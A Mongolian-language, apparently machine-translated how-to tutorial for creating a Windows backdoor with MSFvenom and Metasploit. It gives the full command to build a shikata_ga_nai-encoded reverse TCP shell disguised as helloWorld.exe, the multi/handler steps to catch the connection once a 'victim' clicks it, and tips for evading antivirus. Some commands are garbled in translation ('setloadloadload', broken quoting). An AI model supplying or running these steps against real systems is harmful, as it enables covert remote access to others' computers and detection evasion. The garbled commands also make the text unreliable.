Аюулгүй байдлын механизмыг тойрч гарахын тулд арын хаалгыг ихэвчлэн нууцаар, ихэвчлэн илрүүлдэггүй байдлаар ашигладаг. Msfpayload ба msfencode -ийн хослол болох MSFvenom -ийг ашиглан урвуу бүрхүүл TCP ашиглан халдагчтай буцаж холбогддог арын хаалга үүсгэх боломжтой. Арын хаалга хөгжүүлэхийн тулд та вирусны эсрэг програмаас зайлсхийхийн тулд хортой програмынхаа гарын үсгийг өөрчлөх хэрэгтэй. Энэ төслийг өөрийн нэвтрэх зөвшөөрөлтэй хос компьютер дээр хийж дуусгах бөгөөд ингэснээр та компьютерийн аюулгүй байдал, энэ төрлийн арын хаалга хэрхэн ажилладаг талаар илүү ихийг мэдэх болно.
Алхам
Алхам 1. Калиг эхлүүлж, терминалын консолыг асаана уу
Алхам 2. Интерфэйсийг харуулахын тулд ifconfig гэж бичээд IP хаягаа шалгана уу
Алхам 3. Кодлогчдын жагсаалтыг харуулахын тулд msfvenom -l encoders гэж бичнэ үү
Та x86/shikata_ga_nai -ийг кодлогч болгон ашиглах болно
Алхам 4. "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe гэж бичнэ үү.
- -a x86 -платформ цонх нь ашиглах архитектурыг тодорхойлдог.
- -p windows/shell/reverse_tcp нь оруулах ачааг тодорхойлдог.
- LHOST нь сонсогчийн IP хаягийг тодорхойлдог.
- LPORT нь сонсогчийн портыг тодорхойлдог.
- -b "\ x00" нь муу тэмдэгтээс зайлсхийх зориулалттай (null байт).
- -e x86/shikata_ga_nai нь кодлогчдын нэрийг тодорхойлдог.
- -f exe> helloWorld.exe нь форматын гаралтыг тодорхойлдог.
Алхам 5. Metasploit -ийг идэвхжүүлэхийн тулд msfconsole гэж бичнэ үү
Одоо та арын хаалгаа бий болгосон. Хохирогч helloWorld.exe дээр дарах үед суулгагдсан бүрхүүлийн ачаалал идэвхжиж, системтэйгээ дахин холбогдох болно. Холболтыг хүлээн авахын тулд та Metasploit дахь олон зохицуулагчийг нээж, ачааллыг тохируулах ёстой
Алхам 6. Use exploit/multi/handler гэж бичнэ үү
Алхам 7. Set setloadloadload windows/shell/reverse_tcp гэж бичнэ үү
Алхам 8. Модулийг шалгахын тулд show options гэж бичнэ үү
Алхам 9. LHOST 192.168.48.129 гэж бичнэ үү
"LHOST" нь сонсогчийн IP хаягийг тодорхойлдог
Алхам 10. Set LPORT 4444 гэж бичнэ үү
"LPORT" нь сонсогчийн портыг тодорхойлдог
Алхам 11. Run гэж бичээд хохирогчийн машинаас холбогдохыг хүлээнэ үү
Алхам 12. Хохирогч helloWorld.exe дээр дарахыг хүлээнэ үү
Дараа нь та хохирогчийн машинтай амжилттай холбогдох болно.
Зөвлөмж
- MSFvenom дээр -i ашиглах нь кодчилолыг давтах болно. Заримдаа давталт нь AV програм хангамжаас зайлсхийхэд тусалдаг.
- Та MSFvenom -ийг ашиглан арын хаалга үүсгэхийг сурч мэдсэн боловч энэ арга нь зарим AV програм хангамжийн эсрэг төгс ажиллахгүй байна. Үүний шалтгаан нь MSFvenom дахь гүйцэтгэлийн загваруудтай холбоотой юм. AV үйлдвэрлэгчид эдгээр загваруудын статик гарын үсгийг нэмж, зүгээр л хайж олох болно. Энэ асуудлын шийдэл бол өөр гүйцэтгэлийн загвар эсвэл өөр хэрэгслийг ашиглах явдал юм.